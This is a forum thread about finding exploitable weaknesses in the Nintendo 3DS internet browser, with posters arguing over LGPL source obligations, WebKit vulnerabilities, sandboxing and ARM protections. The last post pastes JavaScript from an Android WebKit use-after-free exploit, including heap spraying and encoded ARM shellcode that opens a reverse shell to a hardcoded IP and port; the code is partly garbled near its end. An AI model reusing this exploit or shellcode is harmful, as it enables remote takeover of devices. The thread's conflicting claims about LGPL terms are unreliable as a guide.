Hacking Internet Browser built on open source software.

LinkReincarnate

So if you look in your manual in the internet browser and select the last section you'll find that the internet browser (or at least components of it) is licensed as LGPL. One of the requirements of an LGPL license is that the source code must be made available. The manual says it is available on Nintendo's site but I can't seem to find it anywhere. This code may or may not have an exploitable weakness. (I know how to code but I am a newb at reverse engineering so I may be all wet on that point.) Anyone want to poke around on Nintendo's site to try and help me find it?
 
It's almost certainly for one or more libraries, like libcurl. These kinds of libraries have been around a long time and have a very wide deployment, thus making them very well-tested.

That is to say, the source code would be in one of the included libraries and not the actual browser itself.
 
If it's anything like the Wii, it's probably a compact version of Opera. Opera is not open source, so the person above is probably right; the code is likely to open source networking components, which have been examined by thousands of developer eyes over a long period of time. Finding an exploitable weakness in them is not likely.
 
Spoom said:
If it's anything like the Wii, it's probably a compact version of Opera. Opera is not open source, so the person above is probably right; the code is likely to open source networking components, which have been examined by thousands of developer eyes over a long period of time. Finding an exploitable weakness in them is not likely.


yeah they ditched opera...

they use the same browser as psp and ps3..
 
Harakiri23 said:
The OP is wrong, you don't need to release anything for L(Lesser) GPL - only for GPL based code
Not entirely correct. If you make changes to LGPL code, you have to make the changes available.
 
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though

yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits

Sorry to be pessimistic, but:

1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...

2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...

3. There's a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
 
pachura said:
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though

yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits

3. There's a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
Doubtful. The cost for adding that kind of thing to the hardware would be greater than the gain from thwarting such attacks. It's possible that the software may be hardened (here's some examples), but ARM, being embedded, isn't really security-oriented. I'm putting my money on exploits being given only specific contextual access to the hardware.
 
LinkReincarnate said:
So if you look in your manual in the internet browser and select the last section you'll find that the internet browser (or at least components of it) is licensed as LGPL. One of the requirements of an LGPL license is that the source code must be made available. The manual says it is available on Nintendo's site but I can't seem to find it anywhere. This code may or may not have an exploitable weakness. (I know how to code but I am a newb at reverse engineering so I may be all wet on that point.) Anyone want to poke around on Nintendo's site to try and help me find it?
That's a completely wrong statement. Libraries licensed under LGPL do NOT require other third parties to hand over their code.
That is why LGPL was made, to make developers able to use libraries, linking, without needing to share their code.

Source: http://en.wikipedia.org/wiki/GNU_General_P...d_derived_works http://www.gnu.org/copyleft/lesser.html

Also, your talk about weaknesses in code is also kinda invalid. The chance of exploitable holes is much slimmer when you consider it is released under LGPL -- people can freely view the code and identify holes. Also, it would be wise of Nintendo to run applications like the browser in some sort of "sandbox" environment, to make sure you can't exploit future holes.
 
Toad King said:
Harakiri23 said:
The OP is wrong, you don't need to release anything for L(Lesser) GPL - only for GPL based code
Not entirely correct. If you make changes to LGPL code, you have to make the changes available.

That is just plain wrong, please do some research and learn about GPL vs LGPL - you can do what you want with LGPL code - no strings attached!
 
Harakiri23 said:
Toad King said:
Harakiri23 said:
The OP is wrong, you don't need to release anything for L(Lesser) GPL - only for GPL based code
Not entirely correct. If you make changes to LGPL code, you have to make the changes available.

That is just plain wrong, please do some research and learn about GPL vs LGPL - you can do what you want with LGPL code - no strings attached!
For what it's worth Nintendo thinks that they have a requirement to host the code because they are. Whether that is really the case or whether someone at Nintendo f'ed up is irrelevant.
 
pachura said:
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though

yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits

Sorry to be pessimistic, but:

1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...

2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...

3. There's a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
It's a custom job that uses very large chunks of ARM9. ARM9 is in all kinds of Android phones and tablets. Any Android exploits for WebKit?
Yup, they even allow remote code execution. Will that work on the 3DS? Probably not, but it does give a general idea of where vulnerabilities may lie and the methodologies that should be used. BTW that exploit uses JavaScript. Here is the code for those who are interested.
function heap()
{

var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };

var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate

do
{
scode += scode;
scode2 += scode2;

} while (scode.length250){
// alert("freeze");
nodes[0].textContent}

}

}, 0);
}
